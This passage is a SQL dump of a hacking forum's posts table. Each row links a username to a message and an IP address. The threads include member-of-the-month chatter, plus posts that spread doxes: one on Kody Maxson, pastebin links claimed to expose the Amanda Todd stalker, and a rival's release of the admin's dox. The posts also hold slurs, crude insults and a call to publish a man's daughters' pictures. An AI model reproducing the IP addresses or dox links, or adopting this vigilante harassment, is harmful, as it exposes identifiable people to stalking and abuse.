'2f38043e2c124ef0cdc9d227ec8d79f5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5204', '929', '5196', '49', 'RE: AWARD SYSTEM', '0', '257', 'XxTREYZxX', '1350524520', 'yeah it would be great to have my gamers award hah lol', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', 'c46c34cff5c19b546d7cab2a5ddc0dd7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5205', '930', '5197', '7', 'RE: am i a nice and helpfull member', '0', '257', 'XxTREYZxX', '1350524573', 'ok i will help members out :) but i am nice i know i am', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '1d2e09275f6d54c58826a69def100823', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5206', '918', '5088', '65', 'RE: I feel famous', '0', '3', '??????????¢™', '1350524875', 'Of course you will get alot of views because people want to see if he did it.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'f1063d760738695afb0380702bbf6a41', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5207', '929', '5204', '49', 'RE: AWARD SYSTEM', '0', '3', '??????????¢™', '1350524932', '[quote=\'?(???)?TREYZ?(???)?\' pid=\'5204\' dateline=\'1350524520\'] yeah it would be great to have my gamers award hah lol [/quote] No not really because your gamers group isnt even nothing special.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'd4cdc4184f1ac23f0534a5183ba867eb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5208', '928', '5203', '49', 'RE: MOTM', '0', '3', '??????????¢™', '1350524967', '[quote=\'?(???)?TREYZ?(???)?\' pid=\'5203\' dateline=\'1350524467\'] yeah do you wanna contact t3hjoker for us and ask, and also ask him to make a thread about who would want it :) [/quote] He will see this when he gets online, No need to contact him.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'bdda91a4642c4fd4920609b6371da99a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5209', '930', '5205', '7', 'RE: am i a nice and helpfull member', '0', '3', '??????????¢™', '1350525033', '[quote=\'?(???)?TREYZ?(???)?\' pid=\'5205\' dateline=\'1350524573\'] ok i will help members out :) but i am nice i know i am [/quote] I dont know if you are nice because I have never talked to you but I know I havent seen you do anything for members here.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'c111e97aee41fd4d8d1ddfa9ac2dc8b6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5210', '928', '5194', '49', 'RE: MOTM', '0', '257', 'XxTREYZxX', '1350525046', 'yeah true hopefully he does make action of this:)', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '98765a92f036a353a2548d78a2d254e0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5211', '930', '5197', '7', 'RE: am i a nice and helpfull member', '0', '257', 'XxTREYZxX', '1350525156', 'yeah i was currently on another forum for a while i only joined to L33T a week or so , the other forum was UBERS', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '5bee0f36ad1a64da7eb7fafa68a6ace1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5212', '928', '5194', '49', 'RE: MOTM', '0', '222', 'Exposé', '1350525419', 'Lol yeh I think joker or a super mod should post this...to make it official', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '35525a8f4174917e6508d9eb4629cb1e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5213', '929', '5196', '49', 'RE: AWARD SYSTEM', '0', '257', 'XxTREYZxX', '1350525427', 'I DON\'T CARE I JUST WANT MY GAMERS AWARD BECAUSE IT LOOK COOL SORRY FOR THE CAPS, MY BUTTON PLAYS UP ALOT:)', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '706e5c988c9be3dd65542f5034c48f1d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5214', '906', '4982', '42', 'RE: DOX of Kody Maxson', '0', '1', 't3h jok3r', '1350525444', 'As you wish, just want this to spread.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'cdb841840de6a42991662203c77aa94a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5215', '930', '5197', '7', 'RE: am i a nice and helpfull member', '0', '222', 'Exposé', '1350525459', 'I see you posting alot but I never talk to you so not sure what you do lol..', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '96c9fadb6b7d82f8959e96e9c8baa4e6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5216', '929', '5196', '49', 'RE: AWARD SYSTEM', '0', '222', 'Exposé', '1350525523', 'Joker will implement the award system or enable it when the time is right...let\'s not all get crazy', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'a25b3553bda370029d67fbc291eab21b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5217', '929', '5196', '49', 'RE: AWARD SYSTEM', '0', '1', 't3h jok3r', '1350525546', 'I told you guys multiple times about the awards and groups don\'t have special awards.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '68570f5bce378dd2399c08de2bb88f75', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5218', '925', '5174', '7', 'RE: gaming thread down(READ)', '0', '222', 'Exposé', '1350525581', 'I haven\'t been gaming as much because of shit going on in mah life...work...school yeh etc', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '11a96bac9f9a4aca5e9dd63c17e0e6a3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5219', '928', '5194', '49', 'RE: MOTM', '0', '257', 'XxTREYZxX', '1350525594', 'yeah cant wait for it :) who do you think would get it BE HONEST :)', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '928b00cc5f61329e2757a9d796b6e252', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5220', '930', '5197', '7', 'RE: am i a nice and helpfull member', '0', '1', 't3h jok3r', '1350525605', 'Didn\'t chat with you much so don\'t know nice or not but you do help me with the activity.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f8fd3cd6f55ce6c92172f813b2149764', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5221', '915', '5043', '7', 'RE: PasteIT AIO - By ƒ???????????g', '0', '222', 'Exposé', '1350525636', 'OK...and yeh i got 2 members to join last night by just running it like once or twice', '74.76.76.132', '1246514308', '1', '0', '222', '1350525642', '1', '8aca2f13b39381841515a1cc4f9a8793', '0', '1350525642'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5222', '928', '5194', '49', 'RE: MOTM', '0', '222', 'Exposé', '1350525727', 'The most HQ and active member on the site....personally I think it should be NXK or Pown. And someone who hasn\'t had any troubles on the site...', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '7604287c9123d4a64b26897ddecc84a9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5223', '905', '5100', '42', 'RE: Anonymous identified cyber stalker who drove Amanda Todd to suicide', '0', '1', 't3h jok3r', '1350525787', '[quote=\'HoverCatz\' pid=\'5100\' dateline=\'1350480100\'] New info: http://pastebin.com/X4pd8bLM, http://pastebin.com/L0FfyFK1 [/quote] First one got removed. Second one works, can\'t believe a fucking 41 years old old fag would stalk a 15 years old girl.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2a3119375c3a580e2cf7dc6e5c736210', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5224', '603', '2922', '47', 'RE: Custom Pastebin Source Code', '0', '222', 'Exposé', '1350525798', 'Is this similar to the regular pastebin site?', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '0f888701ae7b6a503e1259ada0d54cfd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5225', '930', '5197', '7', 'RE: am i a nice and helpfull member', '0', '257', 'XxTREYZxX', '1350525829', 'yeah im am pretty active but not many other people are active wee need more members and admin check out MOTM thread we should really do it :)', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '7cfcd65c2db62a489137c6dc8e635d05', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5226', '907', '4998', '7', 'RE: Ohio Bus Driver Uppercuts Lady | Mortal Kombat Edit', '0', '1', 't3h jok3r', '1350525972', 'I watched it again, it\'s funny and your welcome.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '09c8657c8bb7726fb43f350541cc736f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5227', '928', '5194', '49', 'RE: MOTM', '0', '257', 'XxTREYZxX', '1350526034', 'yeah i was thinking NXK and iTzIpod it would be so interesting:)', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '46fdbd25c3d093b3714275ac955a9487', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5228', '925', '5174', '7', 'RE: gaming thread down(READ)', '0', '257', 'XxTREYZxX', '1350526091', 'yeah i know how it feels bud:)', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '9588c922e606c0aed9a69bf7e6b2dac4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5229', '921', '5120', '4', 'RE: Hey', '0', '1', 't3h jok3r', '1350526136', 'Welcome to L33Thacking.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '27233f5679c3e1295a694e498e86ef8f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5230', '930', '5197', '7', 'RE: am i a nice and helpfull member', '0', '3', '??????????¢™', '1350526192', 'I have to admit you are active but havent seen you helping people.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'f866421ed28ad9869875b211644800eb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5231', '912', '5023', '7', 'RE: Woah Awesome. Something you should check.', '0', '61', 'NXK', '1350526215', 'You\'re not helping by attacking them back.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '24d748355982919ad86eea9b08d65395', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5232', '928', '5194', '49', 'RE: MOTM', '0', '3', '??????????¢™', '1350526247', 'Out of NXK and IPod I would have to say NXK.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '5c18a6ccd29160115c0f6fae4d160e17', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5233', '916', '5066', '3', 'RE: Subject too long', '0', '1', 't3h jok3r', '1350526305', 'I agree with the OP in fact we received a complaint yesterday about the same thread for being too long. If I increase the number to 90, the title would be too long and annoying so just report them as \"other\".', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'af545825b6de1bf0f0d17b2960681bc1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5234', '603', '5224', '47', 'RE: Custom Pastebin Source Code', '0', '3', '??????????¢™', '1350526331', '[quote=\'ƒ???????????g\' pid=\'5224\' dateline=\'1350525798\'] Is this similar to the regular pastebin site? [/quote] Something like it but when you post a paste its not going to show new pastes on the side and stuff. It is only link only sharing so if the person doesnt have the link no one can see it.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '0767972e49dca01c2e1ec1ddb47e509d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5235', '916', '5066', '3', 'RE: Subject too long', '0', '3', '??????????¢™', '1350526430', 'I got that same error when I tried to post on a thread the other day, Kinda annoying. Need to be fixed.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'c526608b5c251f8a77d9fe99bf5a4ae7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5236', '912', '5023', '7', 'RE: Woah Awesome. Something you should check.', '0', '222', 'Exposé', '1350526450', 'What NXK said....we shouldn\'t antagonize AF or their members...', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '65362369cf2936555d95db6e8aee8cb1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5237', '915', '5043', '7', 'RE: PasteIT AIO - By ƒ???????????g', '0', '1', 't3h jok3r', '1350526542', 'Cool, thanks for the program and advertising guys.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'be56666f1bdbd5d1379ee6adc0dcd8c3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5238', '931', '0', '19', '[Junk]Joker\'s DOX', '0', '272', 'YuckFou', '1350526766', 'This is a sincere fuck you from Antagonism of AF. We have released your dox - [url=http://katethebait.cwahi.net/myforum/showthread.php?t=771994]http://pastebin.com/fz1SGJCK[/url]', '108.171.103.148', '1823172500', '0', '0', '0', '0', '1', '215145bd3787f04a16a72b9edea07e40', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5239', '931', '5238', '19', '[Junk]Joker\'s DOX', '0', '1', 't3h jok3r', '1350526820', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5240', '932', '0', '19', '[Junk]Joker\'s DOX - Updated', '0', '272', 'YuckFou', '1350526964', '[url=http://katethebait.cwahi.net/myforum/showthread.php?t=771994]http://pastebin.com/fz1SGJCK[/url] Link fixed. Suck my dog\'s cock assclown.', '108.171.103.148', '1823172500', '0', '0', '272', '1350526997', '1', 'd83d4f6ebca98d15c76e1ddfdca107bc', '0', '1350526997'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5241', '932', '5240', '19', '[Junk]Joker\'s DOX - Updated', '0', '1', 't3h jok3r', '1350527029', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5242', '933', '0', '19', '[Junk]Joker\'s DOX - Updated', '0', '272', 'YuckFou', '1350527053', '[url=http://katethebait.cwahi.net/myforum/showthread.php?t=771994]http://pastebin.com/fz1SGJCK[/url] Link fixed. Suck my dog\'s cock assclown.', '108.171.103.148', '1823172500', '0', '0', '0', '0', '1', 'bbf931b2a4af196fda0bf663d4bb24fb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5243', '933', '5242', '19', '[Junk]Joker\'s DOX - Updated', '0', '1', 't3h jok3r', '1350527075', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5244', '930', '5197', '7', 'RE: am i a nice and helpfull member', '0', '257', 'XxTREYZxX', '1350527185', 'yeah thats what i am going to start doing thanks for the help', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '931682550bf491fa8356d26d3df0bf14', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5245', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '1', 't3h jok3r', '1350528512', 'CELEBRATING 5,000 POSTS! Thanks everyone.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8ca59cd67aa5e95ca47f43c3d10521d4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5246', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '222', 'Exposé', '1350529295', 'Yay oh wow 5,000 posts that is amazing....', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'b5d4998ab009aa9833874da59a688eaa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5247', '928', '5194', '49', 'RE: MOTM', '0', '1', 't3h jok3r', '1350529378', 'It\'s a nice idea but can\'t implement this till the awards plugin is back because I want to add a MOTM award too and by the time we get the awards plugin we will have around 950 or 1K threads so by then it should be a great time to add this. I was actually also thinking of a news thing but kinda different from HF for now. /Discuss', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0e092e65c81da7cef570f534a6dda100', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5248', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '5', 'Timmy', '1350529579', 'GOD HOW THE VAGINA DID YOU MISS THIS? Off topic section just reached 1K posts :D', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '261697a3a068819dc2193b8eae2c271b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5249', '915', '5043', '7', 'RE: PasteIT AIO - By ƒ???????????g', '0', '5', 'Timmy', '1350529703', 'I think you should add more about us such as what\'s so cool about us and what better stuff we have than HF.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '00bfcd8dc5ea94f3c2172d4c06d01b22', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5250', '928', '5194', '49', 'RE: MOTM', '0', '3', '??????????¢™', '1350529906', 'Thread moved to right section.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'c5690e015ac776a0e45d0520978c0584', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5251', '905', '4966', '42', 'RE: Anonymous identified cyber stalker who drove Amanda Todd to suicide', '0', '5', 'Timmy', '1350529944', 'Arrested? No he\'s daughters (If he has) pictures should be online and he should be lifetime prisoned or death sentence.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c80a1da02b2a7b383bf63d0dcf8becb2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5252', '928', '5194', '49', 'RE: MOTM', '0', '61', 'NXK', '1350529949', 'You guys are making me blush, Stop it. I just do my job that\'s all! [img]http://24.media.tumblr.com/tumblr_mbrkkruaz41qisl9lo2_500.png[/img]', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '50c1f01a1795bdfea7b589bf752b4a18', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5253', '906', '4982', '42', 'RE: DOX of Kody Maxson', '0', '5', 'Timmy', '1350530002', 'I called him but didn\'t pick up maybe too busy sleeping with his wife.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '99c6e41b30289e4a3bcb98f05f7e130b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5254', '910', '5021', '49', 'RE: Referral Contest?', '0', '61', 'NXK', '1350530003', 'I approve this, I can try and help out with some of the prizes.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'd65243859253a42fcfdc280330030660', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, 